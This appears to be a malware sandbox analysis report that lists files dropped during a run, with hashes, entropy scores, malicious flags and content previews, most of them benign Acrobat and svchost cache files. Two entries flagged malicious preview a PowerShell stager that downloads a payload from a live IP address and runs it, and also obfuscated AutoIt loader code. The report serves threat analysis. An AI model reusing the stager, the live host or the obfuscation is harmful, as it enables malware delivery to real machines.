                                                                fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                  qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.8307030598410583
                                                                    Encrypted:false
                                                                    SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugn:gJjJGtpTq2yv1AuNZRY3diu8iBVqFN
                                                                    MD5:00D7269F86C88D5284BAEB91E066EDBD
                                                                    SHA1:D45BAE70275A2CD1B92FFD8F88452FEC592B3493
                                                                    SHA-256:7ADD2080CC3541E7117075A39514FA85FE0B25C45717EC978486E29FC9C91DC4
                                                                    SHA-512:1FE0CF65611B666FFCE569254BDDC6F9CAFE68D293EA30520C265751D851412C28F8BAEAA12096157A85F3DA16AD1388CBE70B4C50AECF4BBFC6E210D202A6A2
                                                                    Malicious:false
                                                                    Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x44575946, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.6585314709485202
                                                                    Encrypted:false
                                                                    SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                    MD5:A2A8F1C0F18866236C9859BB5B6E9AA1
                                                                    SHA1:0AF3171C68BD47E46EEFF1E3B55A40F24BB4C377
                                                                    SHA-256:E867C96085EA118E8C39E77A1B24A5E0A964BA7F947802DD39E20DC17035A90A
                                                                    SHA-512:020A2DDE252D13E4DF69817A93266064DEE59DAB6FBE20E8EBB7E9C755B43326DF370C80493D6BC1DA84BC26CC4AAB46FDC23B9B23237B333A9B175D653345E0
                                                                    Malicious:false
                                                                    Preview:DWYF... ...............X\...;...{......................0.z..........{.......|m.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................Y7*.....|m.................Z........|m..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07919980021070322
                                                                    Encrypted:false
                                                                    SSDEEP:3:Zll/EYeSwZKRtGuAJkhvekl14+QXAllrekGltll/SPj:ZXEz3KRtrxl6fXAJe3l
                                                                    MD5:8068A6E02EF37BA86796922341C9FC00
                                                                    SHA1:FCF72A390A20322CB6DDDC47B309656B17A8556B
                                                                    SHA-256:E38BD036D97063BC3E1A928BB58D4B9CA398B09314F58F04D9F7A2B19B30FEEA
                                                                    SHA-512:74C6D4C9D8F32BCAA2A33651DD5F131BB2508D82CC8DAF63300014490907945C784C614EE0F8A411777CB11977D3CCC8A0B0D564F3D7E8C6B66DF5BBF3F0F4DC
                                                                    Malicious:false
                                                                    Preview:...K.....................................;...{.......|m......{...............{.......{...XL......{..................Z........|m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                    • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                    • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):486
                                                                    Entropy (8bit):5.264402695461477
                                                                    Encrypted:false
                                                                    SSDEEP:12:f73/oomFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/UCknZ9LzjYnRSb8Cba
                                                                    MD5:AA25D3FDAD1F106B38D0FC6EF7812219
                                                                    SHA1:1811C03BBAD3B7ED95835D4CC6D43C664C1B4A5B
                                                                    SHA-256:6CC303DD32C6F3629ACD59CFB6219D30D504AC12BBA0AFD87F38012E211496E0
                                                                    SHA-512:ED1809238957DAF71ADB4F3D0996D9CD51431AC0FB04180F4FEB5A4FE51CF07F95F935D8F56863B019AFAB737E03BE5E2E687FEB8C0416F4E470E40A282EC566
                                                                    Malicious:true
                                                                    Preview:[string]$fU5L = "http://139.99.188.124/QWCheljD.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1240103
                                                                    Entropy (8bit):5.144317310151777
                                                                    Encrypted:false
                                                                    SSDEEP:12288:28V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:qcB7HxicaEmEQD3I1jUZ
                                                                    MD5:5FD6DCD6015C6F3F00D18BE2CE75691F
                                                                    SHA1:63007CCA9ED6C2A903AA30B6FA00EB280D4879A2
                                                                    SHA-256:044C72C01C72338F3559D098BEBF9D251F911B9FF41DD958EB80D8F7C9583C31
                                                                    SHA-512:29DFDE6DBE2BDA1F6FBC7FACD06B9F66BED01BC5C01ECEFC6C35DE0A49D905869ADFFBC89B9934650CC6D28C3F0377FC6BE4CE25F92D54646A909DFAD7282219
                                                                    Malicious:true
                                                                    Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.18942072479918
                                                                    Encrypted:false
                                                                    SSDEEP:6:7Bn8q2P92nKuAl9OmbnIFUt8OBnEfrZmw+OBnEyPkwO92nKuAl9OmbjLJ:7Kv4HAahFUt8Ouz/+OuO5LHAaSJ
                                                                    MD5:2C7E1F46F63FCCF908C5CA3D3063A59A
                                                                    SHA1:BFEB98C597B220052A861F67F9AF641B2B335B68
                                                                    SHA-256:6389E1E0E9BAC09E13C2755AAD581537040AEF23EDB77A29181579F34CAB21FA
                                                                    SHA-512:20C9081E2F246BC430834763E8A104AF4D6F8BE6A2B577E8308CB3016598B49A6F838B55E2B0000592E78600143B30E0CAD4EF66FABC5483444B8492F1886F6D
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.648 b04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-03:13:04.650 b04 Recovering log #3.2024/12/18-03:13:04.651 b04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.18942072479918
                                                                    Encrypted:false
                                                                    SSDEEP:6:7Bn8q2P92nKuAl9OmbnIFUt8OBnEfrZmw+OBnEyPkwO92nKuAl9OmbjLJ:7Kv4HAahFUt8Ouz/+OuO5LHAaSJ
                                                                    MD5:2C7E1F46F63FCCF908C5CA3D3063A59A
                                                                    SHA1:BFEB98C597B220052A861F67F9AF641B2B335B68
                                                                    SHA-256:6389E1E0E9BAC09E13C2755AAD581537040AEF23EDB77A29181579F34CAB21FA
                                                                    SHA-512:20C9081E2F246BC430834763E8A104AF4D6F8BE6A2B577E8308CB3016598B49A6F838B55E2B0000592E78600143B30E0CAD4EF66FABC5483444B8492F1886F6D
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.648 b04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-03:13:04.650 b04 Recovering log #3.2024/12/18-03:13:04.651 b04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):338
                                                                    Entropy (8bit):5.1799879805949
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnNFlyq2P92nKuAl9Ombzo2jMGIFUt8OBnJ01Zmw+OBnJiRkwO92nKuAl9Ombzz:7FIv4HAa8uFUt8O/01/+O/W5LHAa8RJ
                                                                    MD5:09778B33D48D1B290686CB76D493D5C9
                                                                    SHA1:5A3F9B8F4E3C6513F78981DD29673EDAD03B9C21
                                                                    SHA-256:A03EE9F16617F85017D699F59BF2EC97E4C1F2A8491F520C54B1996272A2FF9F
                                                                    SHA-512:E71CDACF4D765C8435051244AB4AD91C2B490AB51B0C90C67AE8C1E519FC53DDDC51046A81BBF4A3336B714D60E74812778ABA33ED1E782919FE4CF8A6DE3017
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.757 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-03:13:04.758 1c14 Recovering log #3.2024/12/18-03:13:04.758 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):338
                                                                    Entropy (8bit):5.1799879805949
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnNFlyq2P92nKuAl9Ombzo2jMGIFUt8OBnJ01Zmw+OBnJiRkwO92nKuAl9Ombzz:7FIv4HAa8uFUt8O/01/+O/W5LHAa8RJ
                                                                    MD5:09778B33D48D1B290686CB76D493D5C9
                                                                    SHA1:5A3F9B8F4E3C6513F78981DD29673EDAD03B9C21
                                                                    SHA-256:A03EE9F16617F85017D699F59BF2EC97E4C1F2A8491F520C54B1996272A2FF9F
                                                                    SHA-512:E71CDACF4D765C8435051244AB4AD91C2B490AB51B0C90C67AE8C1E519FC53DDDC51046A81BBF4A3336B714D60E74812778ABA33ED1E782919FE4CF8A6DE3017
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.757 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-03:13:04.758 1c14 Recovering log #3.2024/12/18-03:13:04.758 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.047195090775108
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                    MD5:70321A46A77A3C2465E2F031754B3E06
                                                                    SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                    SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                    SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.047195090775108
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                    MD5:70321A46A77A3C2465E2F031754B3E06
                                                                    SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                    SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                    SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.047195090775108
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                    MD5:70321A46A77A3C2465E2F031754B3E06
                                                                    SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                    SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                    SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.064657227395732
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqjQDsBdOg2H5DAcaq3QYiubxnP7E4TfF+:Y2sRdsnEdMH5X3QYhbxP7np+
                                                                    MD5:F53F35C861996E37E7E33A28CC225A2C
                                                                    SHA1:1730B6DED15C3B5315C65A2BF439EDD25CE66E6D
                                                                    SHA-256:3571A84C17EC26D9AD9E154C5343A31073B756C86349C13BFB7FA43EB720283E
                                                                    SHA-512:2C90932F33347AA371121D01B5D76FEEC249A02075B1CE3142507E76074A5D8438420B3CD2EAB548A90F6ED9509A14CB0F33CA3AEF81D85726AC2F015C9E225F
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379069593015120","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":670285},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4099
                                                                    Entropy (8bit):5.236077100766031
                                                                    Encrypted:false
                                                                    SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU+AaQwK:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLG
                                                                    MD5:CA57E7B419AE7E916FC4CF5EE7311D0E
                                                                    SHA1:8F97D5A888A21B7F356A8FE04C20CEEEBCC693B1
                                                                    SHA-256:49F9A17D1728B0EB3A8AB730F2142F91290F72268E382471D4E5FEE94040B68C
                                                                    SHA-512:1C19AD9F2D322D59BAB2685D350483729E77ECF71EEE9EFF11B09520EF3F9C1F649FAFC218456AC42101A47D1E3C16F0121F99EA268292406FDAF4021C26FE43
                                                                    Malicious:false
                                                                    Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):326
                                                                    Entropy (8bit):5.155313047954811
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnKcfIjyq2P92nKuAl9OmbzNMxIFUt8OBnKC8/1Zmw+OBnKC8pRkwO92nKuAl9c:77IOv4HAa8jFUt8Op8/1/+Op8P5LHAab
                                                                    MD5:8188A820533C3940A5EE9E70AFE03A25
                                                                    SHA1:F8F1370F75CE5C80195C01DE07433365E79A94B2
                                                                    SHA-256:908AB0AE048265104E352E2EBA20816E5020218D7DC6BCAB071C5F4D41E04853
                                                                    SHA-512:F0333D797BBD3E62A3CB685081BCB93FF2B2C4489DC2D9BF7E301459B979FB76E01BADDD1D451539BE9E71DB85E258D29AE079857D34F56D866058A474B381DD
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.851 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-03:13:04.853 1c14 Recovering log #3.2024/12/18-03:13:04.853 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):326
                                                                    Entropy (8bit):5.155313047954811
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnKcfIjyq2P92nKuAl9OmbzNMxIFUt8OBnKC8/1Zmw+OBnKC8pRkwO92nKuAl9c:77IOv4HAa8jFUt8Op8/1/+Op8P5LHAab
                                                                    MD5:8188A820533C3940A5EE9E70AFE03A25
                                                                    SHA1:F8F1370F75CE5C80195C01DE07433365E79A94B2
                                                                    SHA-256:908AB0AE048265104E352E2EBA20816E5020218D7DC6BCAB071C5F4D41E04853
                                                                    SHA-512:F0333D797BBD3E62A3CB685081BCB93FF2B2C4489DC2D9BF7E301459B979FB76E01BADDD1D451539BE9E71DB85E258D29AE079857D34F56D866058A474B381DD
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.851 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-03:13:04.853 1c14 Recovering log #3.2024/12/18-03:13:04.853 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                    Category:dropped
                                                                    Size (bytes):65110
                                                                    Entropy (8bit):1.1217569600910675
                                                                    Encrypted:false
                                                                    SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                    MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                    SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                    SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                    SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                    Malicious:false
                                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Certificate, Version=3
                                                                    Category:dropped
                                                                    Size (bytes):1391
                                                                    Entropy (8bit):7.705940075877404
                                                                    Encrypted:false
                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                    Malicious:false
                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):71954
                                                                    Entropy (8bit):7.996617769952133
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                    Malicious:false
